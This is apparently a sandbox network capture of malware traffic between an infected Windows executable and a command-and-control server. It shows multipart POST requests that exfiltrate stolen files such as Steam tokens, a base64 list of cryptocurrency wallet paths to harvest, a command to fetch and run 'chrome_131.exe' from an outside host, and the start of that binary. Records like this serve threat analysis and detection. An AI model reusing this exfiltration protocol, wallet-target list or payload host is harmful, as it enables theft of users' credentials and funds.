                                                                                              Oct 30, 2024 19:47:06.885951042 CET562OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDH
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 363
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                              Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file"------IIIECAAKECFHIECBKJDH--
                                                                                              Oct 30, 2024 19:47:07.148030996 CET202INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:07 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=92
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Oct 30, 2024 19:47:07.381558895 CET466OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----JECGIIIDAKJDHJKFHIEB
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 267
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 2d 2d 0d 0a
                                                                                              Data Ascii: ------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="message"wallets------JECGIIIDAKJDHJKFHIEB--
                                                                                              Oct 30, 2024 19:47:07.619817019 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:07 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 2408
                                                                                              Keep-Alive: timeout=5, max=91
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                              Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                              Oct 30, 2024 19:47:07.622453928 CET464OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKF
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 265
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a
                                                                                              Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"files------HIJEGDBGDBFIJKECBAKF--
                                                                                              Oct 30, 2024 19:47:07.858901024 CET202INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:07 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=90
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Oct 30, 2024 19:47:07.874089956 CET562OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJK
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 363
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                              Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="file"------CGIEGHJEGHJKFIEBFHJK--
                                                                                              Oct 30, 2024 19:47:08.111810923 CET202INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:07 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=89
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Oct 30, 2024 19:47:08.209654093 CET202OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 113023
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Oct 30, 2024 19:47:08.848954916 CET202INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:08 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=88
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Oct 30, 2024 19:47:09.079051018 CET471OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDA
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 272
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 2d 2d 0d 0a
                                                                                              Data Ascii: ------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="message"ybncbhylepme------JEBFIIIEHCFHJKFHDHDA--
                                                                                              Oct 30, 2024 19:47:09.316293001 CET314INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:09 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 88
                                                                                              Keep-Alive: timeout=5, max=87
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Data Raw: 61 48 52 30 63 48 4d 36 4c 79 39 6e 62 33 4e 77 4c 6d 4e 73 61 57 35 70 59 32 46 32 5a 58 4a 30 61 57 64 6c 62 69 35 6a 62 32 30 76 64 47 31 77 63 43 39 6a 61 48 4a 76 62 57 56 66 4d 54 4d 78 4c 6d 56 34 5a 58 77 78 66 44 42 38 55 33 52 68 63 6e 52 38 4d 48 77 3d
                                                                                              Data Ascii: aHR0cHM6Ly9nb3NwLmNsaW5pY2F2ZXJ0aWdlbi5jb20vdG1wcC9jaHJvbWVfMTMxLmV4ZXwxfDB8U3RhcnR8MHw=


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.44973845.91.200.39806556C:\Users\user\Desktop\b4s45TboUL.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 30, 2024 19:47:20.365736961 CET471OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECF
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 272
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a
                                                                                              Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EHDAAECAEBKJKFHJKECF--
                                                                                              Oct 30, 2024 19:47:22.843914986 CET203INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:21 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.44973187.106.236.484436556C:\Users\user\Desktop\b4s45TboUL.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-30 18:47:10 UTC94OUTGET /tmpp/chrome_131.exe HTTP/1.1
                                                                                              Host: gosp.clinicavertigen.com
                                                                                              Cache-Control: no-cache
                                                                                              2024-10-30 18:47:10 UTC272INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Wed, 30 Oct 2024 18:47:10 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 8662936
                                                                                              Last-Modified: Wed, 30 Oct 2024 13:44:38 GMT
                                                                                              Connection: close
                                                                                              ETag: "67223846-842f98"
                                                                                              X-Powered-By: PleskLin
                                                                                              Accept-Ranges: bytes
                                                                                              2024-10-30 18:47:10 UTC16112INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0e 00 db 86 21 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 10 01 00 00 a2 6c 00 00 00 00 00 58 e0 c5 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 f7 00 00 04 00 00 7a 7a 84 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd!g"lX@zz`
                                                                                              2024-10-30 18:47:11 UTC16384INData Raw: 90 b4 c3 0c 0f fb 46 dc 2f 68 9d 7e a5 0b 1c bb 09 26 b4 91 fb 05 bd d4 b5 fb 28 8f d2 01 c6 b3 fe 60 cc e0 7b 4b fe ec ac 66 7b fc 7d fa 16 54 6e 3a de 1b bc cc 24 84 53 fd 65 bb 7f c7 5b e2 74 af 38 84 84 ba ca 37 0c e7 ed 19 26 28 e9 b6 20 d4 8f c4 83 06 5c 84 d9 5b 27 3d 39 21 3f 43 6e cf 77 39 0f 22 25 95 c3 05 4b e2 4c 69 07 52 0a 8b 65 57 9e 10 1c 20 1d 79 19 d3 34 1b c5 22 6c 5a 8f 08 4d b5 3a dc 51 eb 73 21 17 12 38 dc 0d d1 20 2c 61 d9 0f fc 42 fe 40 05 aa f6 60 bc d5 f0 34 17 65 b8 cd a8 f1 39 42 d1 7f 92 c7 18 d6 0f 33 78 55 a9 46 32 17 14 57 e2 1c 03 fd 1a 30 d4 6f c6 83 96 40 19 8c 9d 37 14 4f ae 87 c8 4d cd 15 d7 93 0c 37 87 5d ec 2b bd fb b1 cd dc d1 54 cb 14 5d 1b 29 0d 03 d1 a4 24 ef 91 08 3d 53 4e 82 13 d2 42 cb 12 0f a6 f5 a1 74 61 96
                                                                                              Data Ascii: F/h~&(`{Kf{}Tn:$Se[t87&( \['=9!?Cnw9"%KLiReW y4"lZM:Qs!8 ,aB@`4e9B3xUF2W0o@7OM7]+T])$=SNBta
                                                                                              2024-10-30 18:47:11 UTC16384INData Raw: 3b 66 82 2e dd 33 85 43 c3 14 81 4e 6c c7 86 59 b8 4a 0c 45 47 09 86 40 81 36 ab 51 a7 37 9c 02 45 d3 9e d4 c4 81 f7 a4 68 99 65 e9 70 9f 37 e8 52 b7 36 e3 40 98 1c e5 e4 54 b4 73 aa 6e a7 6f bc 02 a6 7e f3 39 8a 95 4c 5f a4 ca 60 65 f4 c0 93 49 e8 08 9b b4 2b 9a 91 9f 4f fa ae a1 d3 35 ac 4f ed b1 9a 5d d1 c8 b8 41 d6 09 08 8a c0 2a b9 bc eb 0f 8a 76 17 0a 48 7c ca 23 94 50 d4 05 91 ea 22 51 b9 a3 82 54 cf 59 9b 59 c8 22 89 54 80 33 74 47 ba cc 1c f5 5c a5 12 c4 b5 b7 29 dd 54 dc 1a cd 4c 67 ab 9f b9 3a 58 89 cc fc 12 98 b5 f3 55 91 08 d8 46 8e 19 f9 04 16 fc c0 7c 10 2e dc 74 b3 37 dd 68 b0 2b cc cf 89 ee d5 62 bd 9c 5a 90 29 a0 0a ba 72 c8 06 a4 49 29 35 fb 76 ed 36 92 f4 7a 0b ae c4 3c 89 75 2b 2e 8d 28 f0 76 87 3b e1 51 85 00 e3 bf 81 20 4e 0c 59 f4
                                                                                              Data Ascii: ;f.3CNlYJEG@6Q7Ehep7R6@Tsno~9L_`eI+O5O]A*vH|#P"QTYY"T3tG\)TLg:XUF|.t7h+bZ)rI)5v6z<u+.(v;Q NY
                                                                                              2024-10-30 18:47:11 UTC16384INData Raw: 55 3c 0e 4d 9b e4 38 91 d5 14 48 64 bd 38 4b 96 8d f3 27 b6 70 ac 75 f9 fa ff d6 e5 78 39 0e 40 90 00 71 f7 00 a1 75 8c cb cd 3a 9d 8a c4 75 33 31 f1 7b c1 f8 0a b7 32 69 fb cf 2e 9b de 35 08 6a f4 46 9c 41 3c 5d 55 88 df e1 ed 1b 34 37 a0 87 d9 d5 41 4f f7 8c f5 93 21 3e 81 79 ff 2c b6 1b 39 28 f2 8e 04 55 41 bd de 75 9d 6d d7 74 b9 fc 15 d2 74 9b fa 30 d6 81 c5 7f f9 65 91 75 e9 83 18 dc d6 23 bc 82 41 93 21 d3 ce 7e 1f 1a 54 72 0a 00 6a 9b ea cf c2 77 df 29 e9 5b 16 14 8c 69 ee 36 6c 03 39 d7 98 77 24 e1 44 dc e7 cd 8e 7c df 39 c5 9f d4 29 8e 92 73 c8 d0 d4 e3 fc 24 1b 71 23 00 42 ce d3 74 9b fb ff ea 68 dd cf aa da 81 02 06 1e 21 75 0a c1 4a de a5 c1 38 20 e6 6d 85 26 ec 88 7b d7 e4 28 ff 04 c3 6e 17 ca 9f 61 f2 f8 c1 56 e3 3a 51 73 29 d6 9a ce 6a ce
                                                                                              Data Ascii: U<M8Hd8K'pux9@qu:u31{2i.5jFA<]U47AO!>y,9(UAumtt0eu#A!~Trjw)[i6l9w$D|9)s$q#Bth!uJ8 m&{(naV:Qs)j
                                                                                              2024-10-30 18:47:11 UTC16384INData Raw: 8f e4 d4 05 e5 fc 10 e2 a8 09 26 ad 6b 14 c4 92 6b 07 29 a6 35 9d 2a ea da d8 56 9b bb c7 27 94 9b 0d e2 9c 77 e2 37 93 68 2c 3a 84 36 3b e0 90 bb 0b 24 c3 71 18 18 f8 c1 e7 15 b8 88 9b 15 58 7a f2 c3 f5 da e0 31 62 74 fc df 06 bb 39 23 b6 1f e2 d7 81 41 22 e1 f7 94 09 a5 f7 95 17 d3 bc 8a 08 19 82 53 db ba d1 8a 28 cb fc d2 03 38 25 7e d5 0d c3 6a f0 cf 68 d1 e4 12 bc 5f da f0 a7 1e 7c 14 95 0b 21 f4 e1 0f ec c6 8e 88 d1 cd af 57 bb d5 0e d1 ae f9 c2 89 2c 35 98 95 e8 24 ad 7b d4 3c 8d d9 28 cc 92 8e 03 c5 ee cc b8 b0 ee 96 ce d2 ad 15 8b 25 0b 6c 15 1a c5 a8 eb 3a c3 71 27 3a 79 b3 39 05 9e 50 2c 54 d1 99 7e d5 82 82 b9 75 f5 5d 2c 3a af 98 bc 42 9c 82 da 33 c3 96 7c d6 e4 49 ee 44 8a fb fd d1 d6 bf 1d 3f 9a c4 f1 0e 17 0e 99 c5 99 d1 e6 dc 74 0d bb 32
                                                                                              Data Ascii: &kk)5*V'w7h,:6;$qXz1bt9#A"S(8%~jh_|!W,5${<(%l:q':y9P,T~u],:B3|ID?t2
                                                                                              2024-10-30 18:47:11 UTC16384INData Raw: 32 5e ad a2 63 23 c8 ff 9c 6b 3b 63 9a cc f5 45 71 da 25 d8 7e 82 ce c4 98 d1 cf a4 ce ce 46 41 8b 0d 30 e6 55 f1 de bb 83 ff 18 01 be ff a2 99 8e f5 0b a2 97 0a 75 3d 72 e5 14 d1 74 06 35 bf c4 ea 42 fb 8c 77 03 e5 bf ba 34 0b 6b fe 0d a0 36 e1 58 d5 be 00 cd 93 73 fa 29 94 b6 e5 da d1 17 b3 a1 61 d6 28 ff 7c 69 ff c3 f0 9b bb c9 a8 62 da c3 01 77 bc d2 0a 6e eb f4 bf 1b df 32 ec e7 dd 13 04 7d 96 13 b7 77 de cd f1 bf f5 da f9 08 5e df 9c 05 fd 36 7e 13 39 af 09 e0 09 ed 9b 97 09 f5 c2 7a 02 df a1 89 25 c3 f2 d6 24 c5 fb d3 d2 79 29 db 6e f5 fb cb 4c d5 44 9b 06 2b a1 f9 b8 47 cf 8a e2 ce 8e 77 02 f1 c1 70 34 d5 3e 60 f1 19 79 96 b9 80 ed d2 ba a7 85 3b 3b d2 90 7a fc 92 a1 77 d4 41 0b d7 da 39 75 e6 49 29 33 c1 5f f5 c1 1b e8 11 9a b9 b8 31 bf 86 51 b2
                                                                                              Data Ascii: 2^c#k;cEq%~FA0Uu=rt5Bw4k6Xs)a(|ibwn2}w^6~9z%$y)nLD+Gwp4>`y;;zwA9uI)3_1Q
